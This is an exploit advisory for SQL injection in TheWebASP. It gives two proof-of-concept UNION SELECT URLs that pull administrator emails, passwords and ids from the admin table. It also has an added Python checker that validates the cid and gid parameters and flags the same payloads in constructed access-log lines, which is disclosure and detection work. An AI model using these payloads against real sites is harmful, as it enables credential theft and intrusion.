# Exploit Title: TheWebASP - Multiple SQL Injection vulnerabilities
# Date: 8/17/2011
# Author: Robert Cooper (admin[at]websiteauditing.org)
# Software Link: http://www.thewebasp.com
# Tested on: [Linux/Windows 7]
# Vulnerable Parameters:
goods_detail.php?cid=
goods_detail.php?gid=
menu_list.php?cid=

##############################################################

PoC:

http://www.example.com/goods_detail.php?gid=4031&cid=-1 union all select group_concat(adminEmail,0x3a,adminPwd,0x3a,adminId),2,3,4,5,6,7,8,9,10,11,12 FROM admin--

http://www.example.com/menu_list.php?cid=-99 union all select 1,2,3,4,group_concat(adminEmail,0x3a,adminPwd,0x3a,adminId),6,7 FROM admin--

##############################################################

www.websiteauditing.org
www.areyousecure.net

# Shouts to the Belegit crew
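Added example, not part of this advisory or of TheWebASP: a Python checker that applies the control the advisory implies (cid and gid must be plain integers before they reach a query) and runs the same check over constructed access-log lines to flag requests of the shape shown in the PoC. Script and parameter names are taken from the advisory; the log lines, client address and timestamps are constructed.

```python
import re
from urllib.parse import parse_qs, urlsplit
# Scripts and parameters named in the advisory; each must carry a plain integer id.
WATCHED = {"goods_detail.php": {"cid", "gid"}, "menu_list.php": {"cid"}}
INT_RE = re.compile(r"^-?\d+$")
# Markers of the UNION-based payload shape shown in the PoC.
SQL_TOKENS = re.compile(r"\b(union|select|from)\b|--|0x[0-9a-f]+", re.I)
# Request field of a common/combined access-log line: "GET /path?query HTTP/1.1"
LOG_RE = re.compile(r'"[A-Z]+ (?P<target>\S+) HTTP/[\d.]+"')

def is_valid_id(value: str) -> bool:
    """Allow-list check the scripts should apply before the value reaches SQL."""
    return bool(INT_RE.match(value))

def analyse_request(target: str):
    """Return (script, param, reason) findings for one request target."""
    parts = urlsplit(target)
    script = parts.path.rsplit("/", 1)[-1]
    watched = WATCHED.get(script)
    if not watched:
        return []
    findings = []
    # parse_qs percent-decodes and turns '+' into spaces, so the check sees the decoded value.
    for name, values in parse_qs(parts.query, keep_blank_values=True).items():
        for value in values:
            if name in watched and not is_valid_id(value):
                reason = "non-integer value"
                if SQL_TOKENS.search(value):
                    reason += " with SQL keywords"
                findings.append((script, name, reason))
    return findings

def scan_log(log_text: str):
    """Run analyse_request over every log line; return (line_no, script, param, reason)."""
    hits = []
    for line_no, line in enumerate(log_text.splitlines(), 1):
        m = LOG_RE.search(line)
        if m:
            for script, param, reason in analyse_request(m.group("target")):
                hits.append((line_no, script, param, reason))
    return hits

# Constructed sample log (not from the advisory): one clean request, the two PoC shapes URL-encoded, one unrelated script.
SAMPLE_LOG = """\
203.0.113.5 - - [17/Aug/2011:10:00:01 +0000] "GET /goods_detail.php?gid=4031&cid=12 HTTP/1.1" 200 5120
203.0.113.5 - - [17/Aug/2011:10:00:07 +0000] "GET /goods_detail.php?gid=4031&cid=-1%20union%20all%20select%20group_concat(adminEmail,0x3a,adminPwd),2,3%20FROM%20admin-- HTTP/1.1" 200 5301
203.0.113.5 - - [17/Aug/2011:10:00:09 +0000] "GET /menu_list.php?cid=-99+union+all+select+1,2,3,4,5,6,7+FROM+admin-- HTTP/1.1" 200 4100
203.0.113.5 - - [17/Aug/2011:10:00:12 +0000] "GET /index.php?cid=-1+union+select+1 HTTP/1.1" 200 900
"""
```

Only the two watched scripts are inspected, so the last sample line is deliberately not reported; extend WATCHED if other scripts in the same code base build queries from request ids.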